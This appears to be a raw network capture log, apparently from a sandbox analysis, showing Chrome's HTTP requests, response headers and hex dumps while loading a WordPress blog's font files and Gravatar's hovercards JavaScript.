                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: b7 93 99 a7 c0 64 2a 78 20 f0 1b 6f da dd 6b c7 ad 54 b4 9b 17 fd de 24 1b e1 0e 91 86 6c 7d b4 54 81 2b 97 4f 9a a9 ec e3 56 a8 a5 91 63 77 26 e3 8d bd 96 ae 8a da 58 fc 4e d6 42 c5 53 a4 4a 7d b4 85 bf b8 8b 15 cf 55 60 8d 4f c1 0c f0 2c 63 ed 28 0a cb fe c0 f6 7e a4 22 9c 63 fe 39 f3 db 6c 41 e4 af 6a 61 0a 35 86 cc ec 5f 8c bd c0 e7 77 e7 da 0c 3e 20 67 60 16 08 98 3e 8c 61 9b 89 63 72 67 83 30 7d 7c b1 ef 30 28 58 e6 c2 1d be 99 c8 ee 76 22 cd 6a 86 c1 94 33 ed a9 5d db 4a 9b 03 78 df 1c 8d 8d 80 88 94 c7 7e 3e 39 aa 71 43 a4 f1 5f 3f 32 6b 17 71 6d 17 44 08 44 40 f0 7e 20 cb 70 7a 67 e1 0d 57 9b 8e 12 91 41 74 11 01 24 3f 2b 41 48 cb 18 16 c8 d5 4f d3 99 2b c2 18 65 ab a1 13 e1 2d f0 6d a9 14 ea 9c 28 90 d5 85 fb d4 56 e4 90 8b 14 db e4 c0 f7 99 36
                                                                                                                                                                                                                                                                  Data Ascii: d*x okT$l}T+OVcw&XNBSJ}U`O,c(~"c9lAja5_w> g`>acrg0}|0(Xv"j3]Jx~>9qC_?2kqmDD@~ pzgWAt$?+AHO+e-m(V6
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: ef 0a c4 5b fb 43 2a 65 b3 1d ed 3f 69 f9 a6 c4 d5 ab 26 af 41 57 95 86 92 42 dd a5 0f 30 14 c3 3c 93 46 9f 22 1d 52 34 d4 5c db ff da ae 27 a9 fa 17 ab ff d7 6c 48 ad f8 04 d0 d5 a0 d0 18 cf 16 15 02 c1 90 80 73 63 c6 e6 2c c6 3e b8 32 09 3f f0 75 12 8d 98 b2 7f c8 1e 55 b9 b7 4b b3 8a 9f 20 be e9 ff b2 d9 38 a5 4e 97 29 9c 4b c7 e3 5a c1 ed 9d f1 c4 f1 e2 fc c9 40 ed 92 4d 35 48 19 a5 32 5a ad 66 c6 5a 90 61 eb f3 c5 d7 a9 48 b6 2e 1a 68 fe 92 0c c5 d6 a2 49 ec 26 60 f5 cc 81 80 c2 ef 69 ad 9e b2 3f b9 91 fd 6b 2e da a3 79 e9 47 04 2b 86 c0 c2 0d 58 f5 41 24 9d f7 8c 01 f3 79 10 6c 5d 37 2f 81 85 55 3c 2f c7 96 50 d9 3b 79 a7 de 81 8c fc 99 51 bc fd 0d 69 80 41 77 96 f6 a8 03 94 e7 81 5f c2 8a 1d 54 d6 ff 0d 0e 65 17 aa c4 ca d3 cb d1 ed 67 ac 51 08 15
                                                                                                                                                                                                                                                                  Data Ascii: [C*e?i&AWB0<F"R4\'lHsc,>2?uUK 8N)KZ@M5H2ZfZaH.hI&`i?k.yG+XA$yl]7/U</P;yQiAw_TegQ
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 23 b1 d0 cf 89 d7 8b 5c df 79 73 30 44 3e f6 a8 d8 f1 c6 77 0c 3a d1 b9 b3 8b 29 73 3a e5 bb d1 9d 1e f4 b4 e1 5b b7 b0 34 1e 67 38 6c 7f 20 d9 77 7d 5f e8 73 c3 11 61 bb 02 5b c1 fb 3a 2c c2 87 6f a7 22 4b 96 d6 47 6c c3 24 4a bd e5 64 48 0a 8f 12 a4 92 06 1d 06 e9 30 77 b3 4a d0 72 9b c7 86 3c 78 56 14 5b fc 55 55 94 df e9 e7 9a 17 90 82 b3 de 38 e9 be 83 fd 55 b0 bb 2a cf ce 1f e3 df e0 7e 40 63 df d1 e5 ec 9b 1b 8e 59 65 c3 9b b8 ba 70 7d 1a bc a9 b1 1f ad a7 bb 62 c0 21 7f 13 f3 69 bd f3 70 7f c5 e9 94 1f 14 23 40 88 88 d2 22 c1 f5 b7 aa b2 e8 88 ed a7 75 e7 6a 34 1a 8d 46 a3 e7 ea c9 c0 a5 88 87 56 fe e8 30 1c 87 60 58 61 63 94 c1 c1 8b 41 40 44 12 2b 0e 39 e2 d3 8a d4 68 86 f9 62 a6 72 53 a4 86 70 a7 cd 39 e7 9c 73 ce 39 e7 9c 73 ce 39 3f ed 00 f0
                                                                                                                                                                                                                                                                  Data Ascii: #\ys0D>w:)s:[4g8l w}_sa[:,o"KGl$JdH0wJr<xV[UU8U*~@cYep}b!ip#@"uj4FV0`XacA@D+9hbrSp9s9s9?
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: cb cd e3 77 f6 e8 06 ba 4c 34 f3 59 ec fe 72 23 f5 8a 37 d3 46 91 38 76 73 3d 7c 4f 7f c9 c5 ac 9e ad 7f e4 d5 55 37 22 c5 8f 12 9b 57 92 74 19 32 31 b1 64 c9 96 23 17 5b 1e 8e 7c 05 b8 78 0a 15 29 56 82 4f 40 18 15 29 cd c2 91 af 5e 83 9e 36 de 8a 84 81 bb 50 9d ec 47 89 dc 29 ba 4d 72 16 a8 2d 6b ef b9 8e 29 fd 54 46 c8 84 b9 92 e4 b4 f8 8e 16 df f1 1d 2d 5a b4 76 b7 22 65 f8 3b 73 98 f3 43 bd 35 6c be e4 c9 1d 1e 78 e2 b5 41 b2 ff f0 f0 9d 62 6f 01 00 00 00 00 00 00 b8 fc 30 4b 61 18 86 8f 9d 31 ca 81 61 f8 44 19 ab 9c 6f c4 aa df ac 73 b1 38 1e b6 28 1f 4d c9 88 13 fc e2 7c 49 39 7e f3 1e 73 7d e4 6c 8c 6c d7 8a 87 97 0c 59 da cd 47 10 98 44 af 11 dd 22 2c 8a 9d c6 94 e5 41 89 7b 5b 9d 5e c7 d0 98 45 37 f6 d5 b5 e2 a1 e9 4a bb d5 fc ba f9 dc 30 dc 02
                                                                                                                                                                                                                                                                  Data Ascii: wL4Yr#7F8vs=|OU7"Wt21d#[|x)VO@)^6PG)Mr-k)TF-Zv"e;sC5lxAbo0Ka1aDos8(M|I9~s}llYGD",A{[^E7J0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  15192.168.2.1649722192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC634OUTGET /s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZ1rib2Bg-4.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: fonts.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                                  Content-Length: 100328
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 14 Sep 2023 00:44:39 GMT
                                                                                                                                                                                                                                                                  Age: 370047
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC950INData Raw: 77 4f 46 32 00 01 00 00 00 01 87 e8 00 10 00 00 00 04 c5 5c 00 01 87 81 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 18 1b 84 c1 1a 1c 81 aa 78 06 60 3f 53 54 41 54 48 00 81 ca 1a 11 08 0a 88 cd 18 87 a0 43 0b cf 50 00 01 36 02 24 03 cf 4a 04 20 05 92 00 07 81 c9 1e 0c 07 5b 1f 46 b4 da 52 64 bb 7b f6 7d 50 61 26 74 25 2b 1b a4 04 c6 56 51 45 06 88 aa 6b 8c ee 2f 18 13 67 6a 58 0f 67 82 8c 21 1b 07 83 c0 5b cf 6e bd 74 8c e1 81 0d a6 5a 57 ab 3b dc 60 6e 6a eb 41 c4 75 27 b2 fa 51 b5 76 c7 85 ff ff ff ff ff ff ff ff ff ff ff ff ff ff bf 95 64 11 e9 74 77 ee 7f f6 ee be e9 8b ca 23 54 3a 08 01 06 1c db 60 c0 2d 09 71 e2 24 42 44 33 7a 8a 05 86 88 b2 bc 88 c0 fb 80 cc 60 49 0f aa 41 10 d3 5e 6a dd a8 b6 94 6e 38 1a 17 52 24
                                                                                                                                                                                                                                                                  Data Ascii: wOF2\x`?STATHCP6$J [FRd{}Pa&t%+VQEk/gjXg![ntZW;`njAu'Qvdtw#T:`-q$BD3z`IA^jn8R$
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 22 7e 63 93 35 fa 2d bd 55 8c 31 ea bf d2 19 f4 0f b5 49 78 98 bc a5 d6 6f ae 7b af 5e 7d f0 db a3 f7 12 6e dd 77 98 b8 c6 03 b8 c2 57 98 c9 0d 93 2b 55 00 77 60 a6 c6 6a 64 06 7e 2a d3 b1 55 73 75 f5 58 35 32 4e 24 93 bf 51 29 94 27 7d 76 f2 79 d5 2e e7 2a 26 56 11 13 bd 0d 49 f9 87 d2 f3 97 4c cf 54 c8 c2 38 d6 83 4a ca 4c 9d a9 e2 87 97 ab 46 9a e9 4d 9c b4 dd 51 66 65 2d fb 89 7a 96 b1 78 b9 ff 96 e1 2e f9 45 1a 5a 69 cf f5 af f4 7e 1e ac d1 a7 f4 16 3f 6f ca 72 ae fe 4d f1 f1 08 ff fb 1f 35 66 29 79 0f 48 31 6e 5d f5 05 d0 44 74 31 c4 94 5a b6 c3 70 5e d3 2d 1e a5 c4 eb f3 eb f7 f9 07 f8 57 fb 66 36 60 9d 93 17 56 32 4b d6 71 95 7c bb 22 19 c8 3e 3c 3f 9d 7f ee 7d 1a 69 9a c6 ac a9 90 7a ac 62 a9 1a 2d b4 58 91 8a 21 b5 b5 45 44 7f 51 2b 45 c7 9c 19
                                                                                                                                                                                                                                                                  Data Ascii: "~c5-U1Ixo{^}nwW+Uw`jd~*UsuX52N$Q)'}vy.*&VILT8JLFMQfe-zx.EZi~?orM5f)yH1n]Dt1Zp^-Wf6`V2Kq|"><?}izb-X!EDQ+E
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: ea b6 4c 58 ad cd 55 00 b8 a3 0a e9 da 84 0d 58 07 78 8f d6 d2 d3 21 1b 27 6b 54 9d af 6e 6c 09 e0 99 33 b4 3b 4f 8b 05 76 1d 9c 57 5a 9b 71 00 01 53 20 ce 01 06 fe cb 49 00 fc d2 94 9b 8f b2 81 0c e8 c4 2e a0 96 cd 3d f4 22 a1 c3 f0 0d 73 ab ad 1d 34 a6 8b 2e a1 07 b1 17 6d 84 02 80 84 85 02 04 cd b6 a5 52 cc bc e0 ce 06 51 ba 95 2d cf c1 f0 26 78 1c de 22 7c 23 a1 10 12 6a 00 21 0c da e5 19 dc 1e 4f 3f 26 2b 6d ac dc de 7d 50 14 cb 6c da 26 88 25 6b 88 26 c0 30 38 3c cf 1f f3 27 16 7d 6e bd 75 73 eb b0 6c 02 49 f6 ed 07 c1 d5 11 03 c9 8a 60 f7 bf c5 5f 34 08 9b 29 35 c7 80 dc 03 2a f7 97 a4 b0 4d 52 6b fc 33 11 55 7b 7f 1a 85 bd 76 73 12 89 e3 49 83 d1 2c f1 24 21 9d a2 be 70 20 91 28 84 4e f9 e7 6d 5a b6 33 f6 c1 c8 47 d2 a1 c2 72 d0 7b b8 0e d5 17 6f
                                                                                                                                                                                                                                                                  Data Ascii: LXUXx!'kTnl3;OvWZqS I.="s4.mRQ-&x"|#j!O?&+m}Pl&%k&08<'}nuslI`_4)5*MRk3U{vsI,$!p (NmZ3Gr{o
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 7d 3d ba 9c 5b 6c 7b 05 b5 a0 24 17 a2 10 1d d2 84 0e 69 85 b1 3c 49 46 d1 40 c6 64 6c 1e eb f2 f3 b5 ff 39 10 b5 26 fe ec 09 13 38 11 c2 cb e0 23 4a 85 2a a5 e2 45 45 85 ab cb 60 6e 86 d8 44 0b 34 24 10 85 0a a1 ee db ce ec c7 eb 86 98 b3 7a b3 90 6c 4b f2 b7 46 91 60 41 b1 63 43 63 41 05 44 2c e0 50 aa cc 30 d6 e4 8a 89 17 f5 e9 01 06 02 85 87 85 85 85 42 a0 10 28 04 0a 85 81 81 40 89 35 c7 2b 9c 69 a1 f5 d1 e3 7e b0 20 ec 27 93 d1 90 ca f1 18 db 04 02 60 8b 75 10 78 f2 6e 3a 08 c8 c0 53 b3 3d 33 0c 9d 44 4f 5f 6b 12 63 67 52 0d 64 dc 9d fc f0 ff fc da 88 3e fe a0 6b 1e a4 94 33 da d6 74 b3 9c b7 5b b4 6f e9 2c d2 79 8c 2b 24 d7 79 ed 1e 83 ce f4 b0 8d 83 76 96 ee f3 54 4e 57 e8 5b 2a 57 68 5d ed 1d 7f e7 ed 3c 59 0b 3d 2e f6 24 e0 5f 56 2d 5b 6a 45 60
                                                                                                                                                                                                                                                                  Data Ascii: }=[l{$i<IF@dl9&8#J*EE`nD4$zlKF`AcCcAD,P0B(@5+i~ '`uxn:S=3DO_kcgRd>k3t[o,y+$yvTNW[*Wh]<Y=.$_V-[jE`
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: a3 79 85 be f3 dc cd fa 88 51 ff d7 73 1d 91 b7 61 ad 16 9a 6e a2 ef 2e 47 fb 74 fb ab 2f 84 d4 1e c8 e7 e4 5e ef ff bd 6f 19 ee d1 e5 74 df 87 a0 dc 6e f7 5a bb fb 40 ec 9b ab b7 ed 81 52 de e6 30 c2 6c 1e ed 17 b3 33 eb 58 9c 3b e3 97 fe ca 53 47 cf 24 4b 9d e8 a4 85 e1 53 7f bf 5f 01 51 30 34 ca 84 3e cb ad 81 d8 0a a1 72 02 cd db d2 3b f1 f5 0d 80 5d 15 dc 43 49 10 5f 79 44 b9 c7 f7 34 73 55 59 b9 e4 fc bb ed 21 04 f2 65 05 70 d4 8e 56 cb 90 0c 63 b2 f7 37 3b 34 d6 e7 1c 73 1c 67 e7 9f 67 2e cd 50 b2 f2 20 33 8e eb 67 f5 de a7 2e ed 43 be cb a9 30 69 cd ac 95 30 27 c3 2a 81 5a d0 43 62 71 ca 3c e8 b5 17 6a 44 1d 20 3d 06 f8 e1 2f 8a 94 b7 01 c2 98 65 c6 18 68 cd ae 49 85 19 47 71 b0 6b 32 9d 29 28 0d b7 6f e1 66 e7 ed 82 9e f0 32 96 cc 3c 23 96 95 07
                                                                                                                                                                                                                                                                  Data Ascii: yQsan.Gt/^otnZ@R0l3X;SG$KS_Q04>r;]CI_yD4sUY!epVc7;4sgg.P 3g.C0i0'*ZCbq<jD =/ehIGqk2)(of2<#
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 0b 1d 98 f8 b1 69 8f 5d 82 a6 30 a2 0f d2 3f 03 a9 50 c5 ab 29 d6 14 d7 ef 66 fb bc ab 01 5e ee 3b 0c 72 29 ae d1 8c 85 6e 21 43 54 a8 10 4d ba df d9 bb ee 35 e8 5f a8 31 1c bc ea 6b f0 f2 70 61 a0 33 cf ad 4f 4d 11 ba 21 e0 85 da 31 d0 8c b3 ef f7 16 02 bb 28 37 1f 03 3f 50 8d 1a 65 ca 47 07 2d 56 42 34 9a 09 8d ec 1a 1c 7f ef 37 b0 6a 06 f0 f2 d0 61 f8 c4 89 d3 94 d3 93 5a 01 7c 79 14 f9 a6 50 bd 6d 62 8f 9d d2 81 cd 2a 50 3d 1f 91 8e 53 d2 6d 94 f8 ed c6 77 6a d0 74 ea d1 cd 63 3d 0c 91 fe 47 82 85 99 7b e1 f9 a0 02 dd 14 60 f7 6f cb a3 07 bc f4 53 e0 e5 c1 63 58 5a de 2d 6f b9 b9 63 91 b1 8f a3 cb 03 f5 28 39 f3 a6 0f 24 42 46 46 ea b7 78 91 94 bb b9 f4 bb 23 75 cf c7 ee bf 7f a9 b5 8d f5 9a 69 09 b2 ba f6 c6 1d 06 de ae ce a8 61 f9 de dd ef 2c 5a 6f
                                                                                                                                                                                                                                                                  Data Ascii: i]0?P)f^;r)n!CTM5_1kpa3OM!1(7?PeG-VB47jaZ|yPmb*P=Smwjtc=G{`oScXZ-oc(9$BFFx#uia,Zo
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 1d de 85 6f bb 84 50 62 50 01 c9 81 99 30 bb c1 96 de 29 88 a8 32 bb ef ad 62 1a 8c 72 4c 86 65 6a 3b 60 11 e8 16 2b 6d c0 29 34 c8 d1 bb 94 21 c1 b6 b9 75 c9 d0 e4 cd 73 11 bb 01 ee 10 ac bc fe 0e ee f1 08 59 f9 8a 01 17 0c d4 b0 18 32 e0 9c da 40 d6 42 21 e5 5e fb 85 f6 24 6c 32 7d ed c1 ac 05 0d 65 16 11 34 7c 02 2e e0 c6 a8 b8 15 f0 2f 2b e4 a1 48 a0 0f 1f 50 b5 ce 46 18 55 44 35 d6 bc 05 b8 0a 37 b5 f5 62 ac b1 18 03 3d bc 55 0e 9a e5 09 c0 73 fa 94 fd 16 43 8f b0 d8 f0 e9 89 81 05 3b 62 13 3d 77 e8 bd 86 9e 49 58 51 79 08 70 64 89 38 ed 0c a1 85 d3 8f ac 95 b1 1c 40 ac 76 40 37 b4 23 85 37 78 e5 eb 63 71 aa b0 2a 8c b2 cc 6a c6 f2 40 c1 23 0a 4c d2 41 1b 26 18 2b ec d1 76 83 82 f9 cd ce 5d bb 23 1f 7d 00 7f 97 e4 f9 26 fb fc 68 e3 fd c2 0f e7 3d 6a
                                                                                                                                                                                                                                                                  Data Ascii: oPbP0)2brLej;`+m)4!usY2@B!^$l2}e4|./+HPFUD57b=UsC;b=wIXQypd8@v@7#7xcq*j@#LA&+v]#}&h=j
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 9b 7c ed 23 ad fe 23 1a e9 cd 68 18 57 08 ad c8 b2 8d 91 5b 70 cf 02 fd a8 79 23 9f b0 e4 e6 6b cd 20 36 23 10 75 d3 6f f1 28 4a cb e5 b6 ca d8 58 b7 72 19 ae 90 bc 6e 70 fb 0f 5b 1e ba 73 08 2a 6a ba 47 c0 5d ce e0 2c 24 da 04 e9 7c 55 2a c6 d0 ff 95 0e ab c8 45 2b 70 2f 06 1e 5c 6e 96 0b 01 30 b3 b9 5c 9a 9b e3 47 74 f4 b2 9b b8 21 6e 7a 71 11 01 1e 8b af 35 38 2e 8e e8 9b 5a ec 8f 27 e6 16 e6 d0 61 bc 71 fc 01 ae a9 b7 68 a1 93 eb 83 04 d3 05 c8 29 ea 8c 0c e2 5d b1 af 06 72 d5 2d 2d e9 20 13 c7 64 ed 74 42 db 78 85 3b fb 68 6c 27 70 a7 38 5a e0 d4 9a 39 d4 17 71 a9 06 b8 ba 4d 32 27 59 87 6c ae 40 ba 9a 27 33 30 26 74 68 c5 9b 0d 56 c3 1a f0 47 f5 4b 5a bf 5d 1c 3a 71 34 70 8a e5 0f 2a 3f 3e 21 7d 46 b1 68 d0 a3 91 f2 94 f5 b3 7d cc e4 17 d6 0d 30 8f
                                                                                                                                                                                                                                                                  Data Ascii: |##hW[py#k 6#uo(JXrnp[s*jG],$|U*E+p/\n0\Gt!nzq58.Z'aqh)]r-- dtBx;hl'p8Z9qM2'Yl@'30&thVGKZ]:q4p*?>!}Fh}0
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 07 f1 18 ea 75 e1 1e c0 8b b7 8b 1d 46 ab 28 92 4b 5a ad c8 76 e3 92 5c f3 62 89 15 76 1c e5 76 d1 14 46 f5 68 49 be 7e 3a d1 6d 08 84 91 75 38 e6 8f 11 4c 07 e4 c1 22 c5 98 45 04 43 5f 3b 82 4e fa f3 01 0c 0a 1e 2d cc 46 80 1b 06 eb 3b 02 39 d7 09 65 71 1d df 61 70 9c 9d 05 f4 de 10 ee 83 4f b7 17 11 4b 1e 09 9c 0b e2 22 97 b8 cc 15 ae 72 8d eb 72 a3 cf fb 98 ff 27 80 1f b6 90 8b b9 a1 59 ec 1d 42 e3 e3 e5 fc c2 82 60 4b b0 4b 76 4f 42 71 0a 51 26 7c 63 5e 0c 58 3c 53 af 8d d7 3c 5b 8d 1d 28 3a 24 86 75 a2 ea 24 e9 14 37 41 27 23 9d 56 2e 27 2e 90 d3 80 92 77 ea 13 5a 64 59 c7 59 a5 3b 55 62 b5 ff 37 74 93 e5 16 3c e5 05 ef d0 c7 00 13 3c 8a 52 4d b2 4a a9 ca 58 af c8 9d 50 13 b7 a5 b5 4a cb a9 00 bf db 83 d7 51 25 ca df 39 74 7d 99 4c 25 de c0 6a 52 83
                                                                                                                                                                                                                                                                  Data Ascii: uF(KZv\bvvFhI~:mu8L"EC_;N-F;9eqapOK"rr'YB`KKvOBqQ&|c^X<S<[(:$u$7A'#V.'.wZdYY;Ub7t<<RMJXPJQ%9t}L%jR
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 66 aa c5 b4 3a a6 4d bb 0e c7 75 ea d2 ad c7 09 bd fa 9c 74 ca 69 fd ce 38 6b 20 06 77 82 ec d7 4d c9 f5 7d a6 e5 e3 bb 93 1f d5 a0 3c 9a 07 e8 ba 02 13 e8 00 41 ea 28 9a d1 23 03 cb 61 5e 10 25 59 51 35 a3 c9 6c 41 0c 80 10 8c a0 18 4e 90 14 cd b0 1c 2f 88 92 ac a8 9a 6e 98 96 cd ee 70 ba dc 1e af 79 f2 79 9e a9 20 90 f9 01 2a ca f0 4e 45 e5 20 38 a9 2f 5b b7 6e 23 ff 89 ac 24 2a 4c b3 8b 52 44 4f 39 72 e5 a1 ba 2d 5f 81 42 77 14 29 56 a2 54 99 72 15 2a 55 a9 46 53 a3 56 1d ba 7a 0d 1a 31 34 69 d6 72 50 80 9f b4 5e fd 54 f5 e9 5f 82 d3 e6 fc 7a 09 94 ee a8 ef 3e ae c1 63 d4 15 f8 3c b0 3b bd d6 cd 00 10 82 11 14 c3 09 32 54 ae 46 67 30 59 6c 0e 97 c7 17 08 45 62 89 54 26 57 28 55 6a 8d 56 a7 37 33 b7 30 58 5a 59 db d8 da d9 1b 1d c2 4c cc 97 4a 65 e6 1e
                                                                                                                                                                                                                                                                  Data Ascii: f:Muti8k wM}<A(#a^%YQ5lAN/npyy *NE 8/[n#$*LRDO9r-_Bw)VTr*UFSVz14irP^T_z>c<;2TFg0YlEbT&W(UjV730XZYLJe


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  16192.168.2.1649723192.0.73.24437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC444OUTGET /js/hovercards/hovercards.min.js?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 0.gravatar.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 13581
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 24 Sep 2024 13:56:26 GMT
                                                                                                                                                                                                                                                                  ETag: "66f2c50a-350d"
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                                  Expires: Tue, 05 Nov 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=604800
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC930INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 72 65 74 75 72 6e 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 74 28 72 29 7d
                                                                                                                                                                                                                                                                  Data Ascii: !function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 67 52 69 67 68 74 22 2c 72 69 67 68 74 3a 22 70 61 64 64 69 6e 67 4c 65 66 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 72 3d 7b 22 26 22 3a 22 26 61 6d 70 3b 22 2c 22 3c 22 3a 22 26 6c 74 3b 22 2c 22 3e 22 3a 22 26 67 74 3b 22 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 2c 22 60 22 3a 22 26 23 78 36 30 3b 22 7d 3b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 26 28 61 6d 70 7c 6c 74 7c 67 74 7c 71 75 6f 74 7c 23 33 39 7c 78 36 30 29 3b 7c 5b 5c 26 3c 3e 22 27 60 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 26 22 3d 3d 3d 74 5b 30 5d 3f 74 3a 72 5b 74 5d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 55 52 49 28 74 29 7d 66
                                                                                                                                                                                                                                                                  Data Ascii: gRight",right:"paddingLeft"};function e(t){var r={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;","`":"&#x60;"};return t.replace(/&(amp|lt|gt|quot|#39|x60);|[\&<>"'`]/g,(function(t){return"&"===t[0]?t:r[t]}))}function v(t){return encodeURI(t)}f
